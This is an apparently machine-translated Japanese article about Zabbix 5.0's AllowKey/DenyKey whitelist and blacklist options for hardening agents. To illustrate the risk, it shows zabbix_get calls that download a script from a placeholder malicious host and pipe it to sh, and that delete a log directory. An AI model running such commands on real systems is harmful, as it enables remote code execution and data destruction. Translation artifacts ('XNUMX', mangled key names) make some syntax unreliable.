Zabbix 5.0でのエージェント側メトリクスのブラックリストとホワイトリストのサポート

エージェント側メトリクスのブラックリストとホワイトリストのサポート

ティホン・ウスコフ、統合エンジニア、Zabbix

データセキュリティの問題

Zabbix 5.0 には、Zabbix エージェントを使用してシステムのセキュリティを向上させる新機能があり、古いパラメータを置き換えます。 リモートコマンドを有効にする.

エージェントベースのシステムのセキュリティの向上は、エージェントが潜在的に危険なアクションを多数実行できるという事実から生まれています。

• エージェントは、構成ファイル、ログ ファイル、パスワード ファイル、またはその他のファイルから、機密情報や潜在的に危険な情報を含むほぼすべての情報を収集できます。

たとえば、zabbix_get ユーティリティを使用すると、ユーザーのリスト、ユーザーのホーム ディレクトリ、パスワード ファイルなどにアクセスできます。

zabbix_get ユーティリティを使用したデータへのアクセス

NOTE. データは、エージェントが対応するファイルに対する読み取り権限を持っている場合にのみ取得できます。. しかし、たとえば、ファイル /etc/passwd/ すべてのユーザーが読むことができます。

• エージェントは、潜在的に危険なコマンドを実行することもできます。 たとえば、キー *システム.run[]** を使用すると、ネットワーク ノード上で任意のリモート コマンドを実行できます。これには、エージェント側でもコマンドを実行する Zabbix Web インターフェイスからのスクリプトの実行が含まれます。

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

• Linux では、エージェントはデフォルトで root 権限なしで実行されますが、Windows ではシステムとしてサービスとして実行され、ファイル システムに無制限にアクセスできます。 したがって、インストール後に Zabbix エージェントのパラメータに変更が加えられない場合、エージェントはレジストリやファイル システムにアクセスでき、WMI クエリを実行できます。

以前のバージョンでは、パラメータ EnableRemoteCommands=0 キー * を使用してメトリクスを無効にすることのみが許可されますシステム.run[]** を使用して Web インターフェイスからスクリプトを実行できましたが、個々のファイルへのアクセスを制限したり、エージェントとともにインストールされた個々のキーを許可または無効にしたり、個々のパラメーターの使用を制限したりする方法はありませんでした。

Zabbix の以前のバージョンでの EnableRemoteCommand パラメータの使用

許可キー/拒否キー

Zabbix 5.0 は、エージェント側でメトリクスを許可および拒否するためのホワイトリストとブラックリストを提供することで、このような不正アクセスからの保護に役立ちます。

Zabbix 5.0 では、* を含むすべてのキーシステム.run[]** が有効になり、XNUMX つの新しいエージェント構成オプションが追加されました。

許可キー= — 許可された小切手;

拒否キー= — 禁止された小切手;

ここで、 はメタキャラクタ (*) を使用するパラメータを含むキー名パターンです。

AllowKey キーと DenyKey キーを使用すると、特定のパターンに基づいて個々のメトリクスを許可または拒否できます。 他の構成パラメータとは異なり、AllowKey/DenyKey パラメータの数は制限されません。 これにより、チェックのツリー (実行可能キー) を作成することで、システム内でエージェントが正確に何を実行できるかを明確に定義できます。実行可能キーでは、キーが書き込まれる順序が非常に重要な役割を果たします。

ルールの順序

ルールは、構成ファイルに入力された順序でチェックされます。 キーは最初に一致する前にルールに従ってチェックされ、データ要素のキーがパターンと一致するとすぐに許可または拒否されます。 この後、ルールのチェックは停止し、残りのキーは無視されます。

したがって、要素が許可ルールと拒否ルールの両方に一致する場合、結果は構成ファイル内でどちらのルールが最初にあるかによって異なります。

同じパターンとキーを持つ 2 つの異なるルール vfs.file.size[/tmp/file]

AllowKey/DenyKey キーを使用する順序は次のとおりです。

1. 正確なルール、
2. 一般的なルール、
3. 禁止的なルール。

たとえば、特定のフォルダー内のファイルにアクセスする必要がある場合、まずそのファイルへのアクセスを許可し、次に、確立されたアクセス許可の範囲内にないその他すべてのファイルを拒否する必要があります。 最初に拒否ルールが使用されると、フォルダーへのアクセスは拒否されます。

正しい順序

2 つのユーティリティの実行を * 経由で許可する必要がある場合システム.run[]** であり、拒否ルールが最初に指定されると、最初のパターンは常に任意のキーに一致し、後続のルールは無視されるため、ユーティリティは起動されません。

間違った順序

パターン

基本的なルール

パターンはワイルドカードを使用した式です。 メタキャラクター (*) は、特定の位置にある任意の数の任意の文字と一致します。 メタキャラクターはキー名とパラメータの両方で使用できます。 たとえば、最初のパラメータをテキストで厳密に定義できます。 後続のものをワイルドカードとして指定します.

パラメータは角括弧 [] で囲む必要があります。

• system.run[* - 正しくない
• vfs.file*.txt] - 正しくない
• vfs.file.*[*] - 右

ワイルドカードの使用例。

1. キー名とパラメータで。 この場合、パターンではキー名の特定の末尾とパラメータの特定のセットを受け取りたいことを示しているため、キーはパラメータを含まない同様のキーには対応しません。
2. パターンで角括弧が使用されていない場合、パターンはパラメータを含まないすべてのキーを許可し、指定されたパラメータを含むすべてのキーを拒否します。
3. キーが完全に記述され、パラメータがワイルドカードとして指定されている場合、任意のパラメータを持つ類似のキーと一致しますが、角括弧のないキーとは一致しません。つまり、許可または拒否されます。

パラメータを入力するためのルール。

• パラメータ付きのキーを使用する場合は、設定ファイルでパラメータを指定する必要があります。 パラメータはメタキャラクターとして指定する必要があります。 ファイルへのアクセスを慎重に拒否し、パラメーターの有無にかかわらず、さまざまなスペルの下でメトリックがどのような情報を提供できるかを考慮する必要があります。

パラメータを使用してキーを記述する機能

• キーがパラメーター付きで指定されているが、パラメーターがオプションでメタキャラクターとして指定されている場合、パラメーターのないキーが解決されます。 たとえば、CPU の負荷に関する情報の受信を無効にし、system.cpu.load[*] キーを無効にするように指定する場合は、パラメーターのないキーは平均負荷値を返すことを忘れないでください。

パラメータの入力ルール

ノート

調整

• 検出ルールやエージェント自動登録ルールなど、一部のルールはユーザーが変更できません。 AllowKey/DenyKey ルールは、次のパラメータには影響しません。
  - ホスト名項目
  - ホストメタデータ項目
  - HostInterfaceItem

NOTE. 管理者がキーを無効にした場合、クエリを実行しても、Zabbix はメトリクスまたはキーが「」カテゴリに分類される理由に関する情報を提供しません。サポートされていません'。 リモートコマンドの実行禁止情報もエージェントログファイルには表示されません。 これはセキュリティ上の理由からですが、何らかの理由でメトリクスがサポートされていないカテゴリに分類される場合、デバッグが複雑になる可能性があります。.

• 外部構成ファイルを接続する際の特定の順序 (たとえば、アルファベット順) に依存しないでください。

コマンド ライン ユーティリティ

ルールを設定した後、すべてが正しく構成されていることを確認する必要があります。

次の XNUMX つのオプションのいずれかを使用できます。

• Zabbix にメトリクスを追加します。
• でテストします zabbix_agentd。 Zabbix エージェント (オプションあり) -印刷 (-p) は、設定で許可されていないキーを除くすべてのキー (デフォルトで許可されている) を示しています。 そしてオプションで -テスト (-t) 禁止されたキーの場合は ' が返されますサポートされていないアイテムキーです'。
• でテストします zabbix_get。 ユーティリティ zabbix_get オプションあり -k 戻ります 'ZBX_NOTSUPPORTED: 不明なメトリック'。

許可または拒否

ファイルへのアクセスを拒否し、たとえばユーティリティを使用して検証できます。 zabbix_getファイルへのアクセスが拒否されたことを意味します。

**

NOTE. パラメータ内の引用符は無視されます.

この場合、別のパスを介してそのようなファイルへのアクセスを許可できます。 たとえば、シンボリックリンクからリンクされている場合です。

指定されたルールを適用するためのさまざまなオプションを確認し、禁止事項を回避する可能性も考慮することをお勧めします。

問答

質問。 ルール、許可、禁止を記述するために、独自の言語を持つこのような複雑なパターンが選ばれたのはなぜでしょうか? たとえば、Zabbix で使用される正規表現が使用できなかったのはなぜですか?

答え. 通常、エージェントは XNUMX つだけであり、膨大な数のメトリクスをチェックするため、これは正規表現のパフォーマンスの問題です。 Regex は非常に重い操作なので、この方法で何千ものメトリクスをチェックすることはできません。 ワイルドカード - 普遍的で広く使用されているシンプルなソリューション.

質問。 インクルードファイルはアルファベット順にインクルードされていませんか?

答え. 私の知る限り、ルールを複数のファイルに分散した場合にルールが適用される順序を予測することは事実上不可能です。 すべてのAllowKey/DenyKeyルールをXNUMXつのインクルードファイルに収集することをお勧めします。これらのルールは相互に作用するため、このファイルをインクルードする必要があります。.

質問。 Zabbix 5.0 では、オプション「EnableRemoteCommands=' が構成ファイルに欠落しており、AllowKey/DenyKey のみが使用可能ですか?

答え。 はい、そうです.

ありがとうございました！

出所： habr.com